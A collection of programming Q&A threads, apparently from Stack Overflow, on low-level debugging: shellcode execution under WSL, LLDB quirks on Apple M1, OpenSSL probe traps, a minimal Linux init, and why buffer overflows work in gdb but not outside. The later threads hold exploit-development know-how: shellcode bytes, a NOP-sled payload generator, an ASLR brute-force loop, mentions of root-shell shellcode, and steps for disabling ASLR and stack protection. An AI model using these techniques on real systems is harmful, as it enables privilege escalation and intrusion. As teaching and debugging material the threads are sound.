Unable to execute assembly code located in the program's data segment in WSL

This program overrides the return address of the main function to point to a character array of encoded x86-64 assembly instructions. The instructions simply encode a NOP followed by the syscall exit(1).
/* 90: nop; 48 31 c0: xor %rax,%rax; 48 89 c7: mov %rax,%rdi;
   48 ff c7: inc %rdi (status = 1); 04 3c: add $0x3c,%al (rax = 60 = __NR_exit); 0f 05: syscall */
char shellcode[] = "\x90\x48\x31\xc0\x48\x89\xc7\x48\xff\xc7\x04\x3c\x0f\x05";

void main() {
    long int *ret;
    ret = (long int *)&ret + 2;      /* locate main's return address on the stack */
    (*ret) = (long int)shellcode;    /* redirect it into the shellcode */
}
It is compiled with
gcc program.c -o program.exe -fno-stack-protector -z execstack
under WSL (the Ubuntu app from the Microsoft Store).
The -z execstack flag should cause the stack, as well as all other writable portions of the program, to be executable (on Linux this has historically worked by the kernel enabling the READ_IMPLIES_EXEC personality for such binaries).
Since the global character array resides in the .data section of the executable, it should therefore be executable. That is true when running the program on a Linux VM, but apparently not on WSL. On WSL, control is still properly redirected to the NOP, but the program segfaults when it tries to execute that instruction (presumably on the code fetch from a non-executable page). Running gdb shows this after returning from main:
=> 0x8004010 <shellcode>: nop
0x8004011 <shellcode+1>: xor %rax,%rax
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
What could be causing this inconsistency between WSL and real Linux? Does WSL enforce strict W^X, overriding even -z execstack?
Are other Windows security features at play? I do not know whether it is WSL 1 or WSL 2, but the uname -a output is:
Linux LAPTOP-M91FQN9V 4.4.0-18362-Microsoft #836-Microsoft Mon May 05 16:04:00 PST 2020 x86_64 x86_64 x86_64 GNU/Linux
What could be preventing the instructions from running, when the same does not occur on a Linux VM?
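For what it's worth, one way to take the execstack/READ_IMPLIES_EXEC question out of the picture is to mark the shellcode's page executable at run time with mprotect. This is only a minimal sketch (the data-to-function-pointer cast is illustrative, not portable C): if this version runs on WSL while the original segfaults, the kernel is refusing executable .data pages rather than mislocating the shellcode.

#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

char shellcode[] = "\x90\x48\x31\xc0\x48\x89\xc7\x48\xff\xc7\x04\x3c\x0f\x05";

int main(void) {
    /* Round the shellcode's address down to its page base, then make
       that page readable, writable, and executable. */
    long page = sysconf(_SC_PAGESIZE);
    uintptr_t base = (uintptr_t)shellcode & ~(uintptr_t)(page - 1);
    if (mprotect((void *)base, (size_t)page, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }
    ((void (*)(void))shellcode)();   /* jump straight into the shellcode */
    return 0;                        /* not reached: the shellcode exits */
}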

Related

Macbook M1 assembly lldb displays only 3 source lines then switches to object code display

First attempt at ARM64 (Apple M1) assembly coding. I have basic 'hello world' code which assembles and runs correctly, but when I run it in lldb, only the first three lines are displayed in full source-code format, like this:
Abenaki:hello jiml$ ~/llvm/clang+llvm-15.0.2-arm64-apple-darwin21.0/bin/lldb hello
(lldb) target create "hello"
Current executable set to '/Users/jiml/Projects/GitRepos/ARM/hello/hello/hello/hello' (arm64).
(lldb) b main
Breakpoint 1: where = hello`main + 4, address = 0x0000000100003f7c
(lldb) r
Process 5017 launched: '/Users/jiml/Projects/GitRepos/ARM/hello/hello/hello/hello' (arm64)
Process 5017 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000100003f7c hello`main at hello.s:19
16
17 _main:
18 mov x0, #0x0 // stdout
-> 19 adrp x1, msg@PAGE // pointer to string
20 add x1, x1, msg@PAGEOFF
21 ldr x2, =msg_len // bytes to output
22 mov x16, #0x04 // sys_write
warning: This version of LLDB has no plugin for the language "assembler". Inspection of frame variables will be limited.
(lldb)
After three steps, the display reverts to bare object code like this:
(lldb) s
Process 5017 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step in
frame #0: 0x0000000100003f88 hello`main + 16
hello`main:
-> 0x100003f88 <+16>: mov x16, #0x4
0x100003f8c <+20>: svc #0x80
0x100003f90 <+24>: adrp x1, 1
0x100003f94 <+28>: mov x2, #0x0
dwarfdump -a shows that all source lines are present in the .o; same behavior for .dSYM assembly. Using the 'list' command in lldb however displays all source lines correctly.
Is this a known issue for LLVM (clang, lldb) development? Any help appreciated...
I have tried LLVM versions 14 and 15 with the same behavior, and searched for similar issues without luck.
I did find this https://stackoverflow.com/questions/73778648/why-is-it-that-assembling-linking-in-one-step-loses-debug-info-for-my-assembly-s but it did not solve my issue.
So I think I have this resolved, but I'm not sure whether it is an actual compiler bug.
I wrote hello world in C, compiled and confirmed complete source display in lldb. I then reran clang with -S to generate the assembler source.
I then assembled that source...
clang -g -c -o hello.o hello.s
clang -o hello hello.o -lSystem -arch arm64
and confirmed that it also runs in lldb with complete source display. Then I moved my hand-written code over line by line to figure out where the problem occurs. It seems my string data and length calculation were the problem. In the data section I originally had:
msg: .ascii "Hello ARM64\n"
msg_len = . - msg
Coming from the Intel world this seems perfectly natural ;-) Adding that length calculation caused some sort of corruption of the debug data. However, the executable has a proper OSO statement pointing at hello.o (nm -ap hello), and the object file has references for all source statements in the source file (dwarfdump --debug-line hello.o), but lldb still doesn't display source code after the third step. Curiously, 'source info -f hello.s' within lldb only listed four lines.
I found three work-arounds. First adding a label between the two statements seems to allow correct behavior:
msg: .ascii "Hello ARM64\n"
nothing:
msg_len = . - msg
Second, using equate:
msg: .ascii "Hello ARM64\n"
.equ msg_len, . - msg
Third, using two labels:
msg: .ascii "Hello ARM64\n"
msg_end:
msg_len = msg_end - msg
I'll file a report with LLVM and see what they say.

Why is LLDB generating EXC_BAD_INSTRUCTION with user compiled library on MacOS?

I want to debug OpenSSL on MacOS to see how it creates an elliptic curve point. So, I compiled OpenSSL with debug symbols and no optimizations. However, when I run with lldb, it doesn't work
$ cat ec.c
#include <crypto/ec.h>
#include <stdio.h>
int main() {
    EC_GROUP *group = EC_GROUP_new_by_curve_name(NID_secp384r1);
    EC_POINT *point = EC_POINT_new(group);
    printf("done!\n");
    return 0;
}
Here is how I compiled and ran the program:
$ gcc ec.c -o ec -I../openssl/include ../openssl/libcrypto.dylib -ggdb3 -O0
$ DYLD_INSERT_LIBRARIES=../openssl/libcrypto.dylib ./ec
done!
Here is what happens when I run lldb and try to break at main:
$ lldb ./ec
(lldb) process launch --environment DYLD_INSERT_LIBRARIES=../openssl/libcrypto.dylib ./ec
Process 3948 launched: '/Users/seanthomas/repos/ec/ec' (arm64)
Process 3948 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_INSTRUCTION (code=1, subcode=0x4a03000)
frame #0: 0x00000001009651a8 libcrypto.3.dylib`_armv8_sve_probe
libcrypto.3.dylib`:
-> 0x1009651a8 <+0>: eor z0.d, z0.d, z0.d
0x1009651ac <+4>: ret
libcrypto.3.dylib`:
0x1009651b0 <+0>: xar z0.d, z0.d, z0.d, #0x20
0x1009651b4 <+4>: ret
Target 0: (ec) stopped.
(lldb)
Does anyone know how to fix this?
I'm not sure whether this can help you or not, but perhaps there are bugs in libcrypto.3.dylib on the ARM architecture.
I met this problem too. The program works when run from the command line in a shell, but it hits this problem when I debug it in VS Code using lldb.
However, when I deleted libcrypto.3.dylib and libssl.3.dylib, built OpenSSL from the OpenSSL_1_1_1m tag, and rebuilt the program, it worked!
Yes, I confirm the issue on Mac M1/M2. Reverting to the old version of OpenSSL fixed the problem. I use the OpenSSL lib in a macOS app of mine, and on launch in Debug mode it crashed right away.
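A plausible explanation for where this stops: OpenSSL detects CPU features at startup by deliberately executing candidate instructions (the _armv8_sve_probe shown above is one of them) and trapping the resulting SIGILL, so in a normal run the fault is invisible. A debugger, however, sees the exception before the signal handler does, which is likely why lldb stops there; continuing past the stop is often all that is needed. Below is a minimal sketch of that probing pattern — not OpenSSL's actual code — with raise(SIGILL) standing in for a real faulting instruction:

#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>

static sigjmp_buf probe_env;

static void on_sigill(int sig) {
    (void)sig;
    siglongjmp(probe_env, 1);   /* unwind out of the faulting instruction */
}

int main(void) {
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_sigill;
    sigaction(SIGILL, &sa, NULL);

    if (sigsetjmp(probe_env, 1) == 0) {
        /* A real probe would execute the candidate instruction here and
           let it fault on CPUs lacking the feature. */
        raise(SIGILL);
        puts("feature supported");
    } else {
        puts("feature not supported");
    }
    return 0;
}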

Want to build bare Linux system that has only a kernel and one binary

I want to build a dedicated Linux system that only ever runs one binary program. This program takes control of the screen via the OpenGL driver and displays patterns. There needs to be keyboard input as well to configure the patterns. Since running this one program will be the sole purpose of the machine, I don't need any GUI, networking, etc. Also, I probably don't need any process scheduling in the kernel since only one process will ever run.
Is it possible to replace /sbin/init with my own binary to achieve this? After the kernel loads, it would then immediately execute my own binary, and that would run the entire time the machine was on. Basically, I want to emulate the way a microcontroller works, but with the benefit of being able to use an x86 CPU with different hardware devices and drivers.
Minimal init hello world program step-by-step
Compile a hello world without any dependencies that ends in an infinite loop. init.S:
.global _start
_start:
    mov $1, %rax             # syscall number: sys_write
    mov $1, %rdi             # fd: stdout
    mov $message, %rsi       # buffer
    mov $message_len, %rdx   # length
    syscall
    jmp .                    # spin forever: init must never return
message: .ascii "FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR\n"
.equ message_len, . - message
We cannot use sys_exit at the end: if PID 1 ever exits, the kernel panics with "Attempted to kill init!".
Then:
mkdir d
as --64 -o init.o init.S
ld -o d/init init.o
cd d
find . | cpio -o -H newc | gzip > ../rootfs.cpio.gz
ROOTFS_PATH="$(pwd)/../rootfs.cpio.gz"
This creates a filesystem with our hello world at /init, which is the first userland program that the kernel will run. We could also have added more files to d/ and they would be accessible from the /init program when the kernel runs.
Then cd into the Linux kernel tree, build it as usual, and run it in QEMU:
git clone git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
cd linux
git checkout v4.9
make mrproper
make defconfig
make -j"$(nproc)"
qemu-system-x86_64 -kernel arch/x86/boot/bzImage -initrd "$ROOTFS_PATH"
And you should see a line:
FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR
on the emulator screen! Note that it is not the last line, so you have to look a bit further up.
You can also use C programs if you link them statically:
#include <stdio.h>
#include <unistd.h>

int main() {
    printf("FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR FOOBAR\n");
    sleep(0xFFFFFFFF);
    return 0;
}
with:
gcc -static init.c -o init
You can run it on real hardware by writing the image to a USB stick at /dev/sdX:
make isoimage FDINITRD="$ROOTFS_PATH"
sudo dd if=arch/x86/boot/image.iso of=/dev/sdX
Great source on this subject: http://landley.net/writing/rootfs-howto.html It also explains how to use gen_initramfs_list.sh, which is a script from the Linux kernel source tree to help automate the process.
Next step: setup BusyBox so you can interact with the system through a shell. Buildroot is a great way to do it.
Tested on Ubuntu 16.10, QEMU 2.6.1.
It might be possible to replace /sbin/init with your program, but you should be aware that process 1 has some specific duties, so I think it is not advisable to replace it.
Remember that the Linux kernel can also start some helper processes on its own, outside the usual chain of forks descending from init. I'm thinking of things like /sbin/modprobe or /sbin/hotplug, etc.
Also, udev (or systemd) has some special roles. On some systems fan control was tied to such things (I forget the details); if unlucky, you could damage your hardware if the fan is not driven properly (but AFAIK this is no longer true on recent hardware).
Searching the vmlinux of a recent 3.15.3 kernel with strings, I find that it knows about:
/bin/init
/bin/sh
/sbin/request-key
/sbin/tomoyo-init
/sbin/modprobe
/sbin/poweroff
/sbin/hotplug
I would recommend instead keeping some existing init program and configuring it to run only your program.
You can put your program into the initrd, and then run it from the initrd's init.
Simply use a boot parameter, e.g. init=/bin/bash.
init is process 1, used by the kernel to start user space. It has a few specific duties, like periodically reaping orphaned children to clean out zombies (a minimal sketch of such an init follows below the link). It sounds like you don't even need that.
Linux Boot parameters you should know
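To make those duties concrete, here is a minimal sketch of a reaping init, with a hypothetical /opt/app standing in for your binary; this is the shape of an init, not a production one:

#include <signal.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

static void noop(int sig) { (void)sig; }

int main(void) {
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = noop;            /* so SIGCHLD interrupts pause() */
    sigaction(SIGCHLD, &sa, NULL);

    if (fork() == 0) {
        execl("/opt/app", "/opt/app", (char *)NULL);  /* hypothetical path */
        _exit(127);                  /* exec failed */
    }
    for (;;) {
        while (waitpid(-1, NULL, WNOHANG) > 0)
            ;                        /* reap every child that has exited */
        pause();                     /* sleep until the next signal */
    }
}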

Buffer overflow works in gdb but not without it

I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program. Within GDB it works. Here is the output:
[root@localhost bufferoverflow]# gdb stack
GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/bufferoverflow/stack...done.
(gdb) r
Starting program: /root/bufferoverflow/stack
process 6003 is executing new program: /bin/bash
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.107.el6_4.2.i686
sh-4.1#
However, when I run the program stack on its own, it segfaults. Why might this be?
Exploit development can lead to serious headaches if you don't adequately account for factors that introduce non-determinism into the debugging process. In particular, the stack addresses in the debugger may not match the addresses during normal execution. This artifact occurs because the operating system loader places both environment variables and program arguments above the beginning of the stack, so their total size shifts every stack address below them.
Since your vulnerable program does not take any arguments, the environment variables are the likely culprit. Make sure they are the same in both invocations, in the shell and in the debugger. To this end, you can wrap your invocation in env:
env - /path/to/stack
And with the debugger:
env - gdb /path/to/stack
(gdb) show env
LINES=24
COLUMNS=80
In the above example, there are two environment variables set by gdb, which you can further disable:
unset env LINES
unset env COLUMNS
Now show env should return an empty list. At this point, you can start the debugging process to find the absolute stack address you envision to jump to (e.g., 0xbffffa8b), and hardcode it into your exploit.
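To see the environment effect directly, here is a tiny demo (nothing in it is specific to an exploit) that prints the address of a stack variable:

#include <stdio.h>

int main(void) {
    char local;
    /* Environment strings live above the stack, so their total size
       shifts every stack address below them. */
    printf("%p\n", (void *)&local);
    return 0;
}

With ASLR disabled, env - ./demo and env - FOO=0123456789abcdef ./demo print addresses that differ by roughly the size of the added variable.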
One further subtle but important detail: there's a difference between calling ./stack and /path/to/stack. Since argv[0] holds the program name exactly as you invoked it, you need to ensure equal invocation strings. That's why I used /path/to/stack in the above examples rather than ./stack and gdb stack.
When learning to exploit memory-safety vulnerabilities, I recommend using the wrapper program below, which does the heavy lifting and ensures equal stack offsets:
$ invoke stack # just call the executable
$ invoke -d stack # run the executable in GDB
Here is the script:
#!/bin/sh

while getopts "dte:h?" opt ; do
    case "$opt" in
        h|\?)
            printf "usage: %s -e KEY=VALUE prog [args...]\n" "$(basename "$0")"
            exit 0
            ;;
        t)
            tty=1
            gdb=1
            ;;
        d)
            gdb=1
            ;;
        e)
            env=$OPTARG
            ;;
    esac
done
shift $(expr $OPTIND - 1)

prog=$(readlink -f "$1")
shift

if [ -n "$gdb" ] ; then
    if [ -n "$tty" ]; then
        touch /tmp/gdb-debug-pty
        exec env - $env TERM=screen PWD="$PWD" gdb -tty /tmp/gdb-debug-pty --args "$prog" "$@"
    else
        exec env - $env TERM=screen PWD="$PWD" gdb --args "$prog" "$@"
    fi
else
    exec env - $env TERM=screen PWD="$PWD" "$prog" "$@"
fi
Here is a straightforward way of running your program with identical stacks in the terminal and in gdb:
First, make sure your program is compiled without stack protection,
gcc -m32 -fno-stack-protector -z execstack -o shelltest shelltest.c -g
and ASLR is disabled:
echo 0 > /proc/sys/kernel/randomize_va_space
NOTE: the default value on my machine was 2; note down yours before changing it.
Then run your program like so (terminal and gdb respectively):
env -i PWD="/root/Documents/MSec" SHELL="/bin/bash" SHLVL=0 /root/Documents/MSec/shelltest
env -i PWD="/root/Documents/MSec" SHELL="/bin/bash" SHLVL=0 gdb /root/Documents/MSec/shelltest
Within gdb, make sure to unset LINES and COLUMNS.
Note: I got those environment variables by playing around with a test program.
Those two runs will give you identical pointers to the top of the stack, so no need for remote script shenanigans if you're trying to exploit a binary hosted remotely.
The address of the stack frame pointer when running the code under gdb differs from its address during a normal run. So you may get the return address right in gdb mode, yet have it wrong when running in normal mode. The main reason is that the environment variables differ between the two situations.
As this is just a demo, you can change the victim code to print the address of the buffer, then set your return address to the buffer's address plus the offset.
In reality, however, you need to guess the return address and add a NOP sled before your malicious code, and you may have to guess multiple times before you hit a correct address (a concrete sketch of this payload layout follows below).
Hope this can help you.
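To make the sled layout concrete, here is a sketch of a payload generator in the format return address × N | NOP sled | shellcode. The address 0xbffffa8b and the exit(1) shellcode are placeholders borrowed from elsewhere on this page, not values for your binary:

#include <stdio.h>

int main(void) {
    unsigned char ret[4] = { 0x8b, 0xfa, 0xff, 0xbf };      /* 0xbffffa8b, little-endian */
    unsigned char code[] = "\x31\xc0\x40\x89\xc3\xcd\x80";  /* exit(1) shellcode */
    int i;

    for (i = 0; i < 32; i++)                  /* the return address, many times */
        fwrite(ret, 1, sizeof ret, stdout);
    for (i = 0; i < 65536; i++)               /* the NOP sled */
        putchar(0x90);
    fwrite(code, 1, sizeof code - 1, stdout); /* shellcode, minus the trailing NUL */
    return 0;
}

Then invoke the victim as ./stack "$(./payload)"; none of the emitted bytes are NUL, so the payload survives argv.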
The reason your buffer overflow works under gdb and segfaults otherwise is that gdb disables address space layout randomization. I believe this was turned on by default in gdb version 7.
You can check this by running this command:
show disable-randomization
And set it with
set disable-randomization on
or
set disable-randomization off
I tried the solution accepted here and it doesn't work (for me). I knew that gdb adds environment variables and that for this reason the stack addresses don't match, but even after removing those variables I couldn't get my exploit to work without gdb (I also tried the script posted in the accepted solution).
But searching the web I found another script that works for me: https://github.com/hellman/fixenv/blob/master/r.sh
Usage is basically the same as the script in the accepted solution:
r.sh gdb ./program [args] to run the program in gdb
r.sh ./program [args] to run the program without gdb
And this script works for me.
I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program... However when I run the program stack just on its own it seg faults.
You should also ensure FORTIFY_SOURCE is not affecting your results. The crash sounds like FORTIFY_SOURCE could be the issue, because it inserts "safer" function calls to guard against some types of buffer overflows. If the compiler can deduce the destination buffer size, then the copy is checked against it and abort() is called on a violation (i.e., your crash).
To turn off FORTIFY_SOURCE for testing, you should compile with -U_FORTIFY_SOURCE or -D_FORTIFY_SOURCE=0.
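As a quick check of whether this is biting you, the following sketch (names are arbitrary) aborts with glibc's "*** buffer overflow detected ***" message when built with gcc -O2 -D_FORTIFY_SOURCE=2 and given a long argument, but overflows unchecked when built with -U_FORTIFY_SOURCE:

#include <string.h>

int main(int argc, char **argv) {
    char buf[8];
    /* With fortification and optimization enabled, the compiler rewrites
       this strcpy into __strcpy_chk, which checks against sizeof buf at
       run time and calls abort() on overflow. */
    if (argc > 1)
        strcpy(buf, argv[1]);
    return 0;
}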
One of the main things that gdb does that doesn't happen outside gdb is zeroing memory. More than likely, somewhere in the code you are not initializing your memory and it is picking up garbage values. gdb automatically clears all memory that you allocate, hiding those types of errors.
For example: the following should work in gdb, but not outside it:
#include <stdlib.h>

int main() {
    int **temp = (int **)malloc(2 * sizeof(int *));  /* temp[0] and temp[1] are NULL in gdb, but not outside */
    if (temp[0] != NULL) {
        *temp[0] = 1;  /* segfault outside of gdb */
    }
    return 0;
}
Try running your program under valgrind to see if it can detect this issue.
The way that works best for me is to attach gdb to the binary's process and use setarch -R <binary> to temporarily disable ASLR protection for that binary only. This way the stack frame should be the same inside and outside of gdb.

ASLR brute force

I just read about Address Space Layout Randomization and I tried a very simple script to try to brute force it. Here is the program I used to test a few things.
#include <stdio.h>
#include <string.h>

int main (int argc, char **argv)
{
    char buf[8];
    printf("&buf = %p\n", buf);
    if (argc > 1 && strcpy(buf, argv[1]));
    return 0;
}
I compiled it with this command:
gcc -g -fno-stack-protector -o vul vul.c
I made sure ASLR was enabled:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
Then, I came up with this simple script:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
The format is
return address many times | 64KB NOP slide | shellcode that runs exit(1)
After running this script for a few seconds it exits with error code 1 as I wanted it to. I also tried other shellcodes that call execv("/bin/sh", ...) and I was successful as well.
I find it strange that it's possible to create such a long NOP slide even after the return address. I thought ASLR was more effective, did I miss something? Is it because the address space is too small?
EDIT: I did some additional research and here is what I found:
I asked a friend to run this code compiled with -m32 -z execstack on his 64-bit computer, and after changing the return address a bit he had the same results.
Even though I did not use -z execstack, I managed to execute the shellcode. I made sure of that by using different shellcodes, which all did what they were supposed to do (even the well-known scenario: chown root ./vul, chmod +s ./vul, a shellcode that runs setreuid(0, 0) then execv("/bin/sh", ...), and finally whoami returning 'root' in the spawned shell).
That is quite strange, since execstack -q ./vul tells me the executable-stack flag bit is not set. Does anyone have an idea why?
First of all, I'm a bit surprised that you do not need to pass the option -z execstack to the compiler to get the shellcode to execute the exit(1).
Moreover, I guess you are on a 32-bit machine, as you did not pass the option -m32 to gcc in order to get 32-bit code.
Finally, I ran your program without success (I waited way more than a few seconds).
So I'm a bit doubtful about your conclusion (unless you are running a very peculiar Linux system, or got lucky).
Anyway, there are two main things that you have not mentioned:
Having a bug that offers an unlimited number of exploitation attempts is quite rare.
Most modern systems run on amd64 (64-bit) processors, which drastically lowers the probability of hitting the NOP zone. (Back-of-the-envelope: on 32-bit x86 Linux the stack base is randomized over a region on the order of 8 MiB, so a 64 KiB sled gets hit roughly once in a hundred-odd tries, which a tight retry loop reaches in seconds; the 64-bit randomization range is larger by many orders of magnitude.)
You may take a look at the section "ASLR Effectiveness" on ASLR's Wikipedia page.
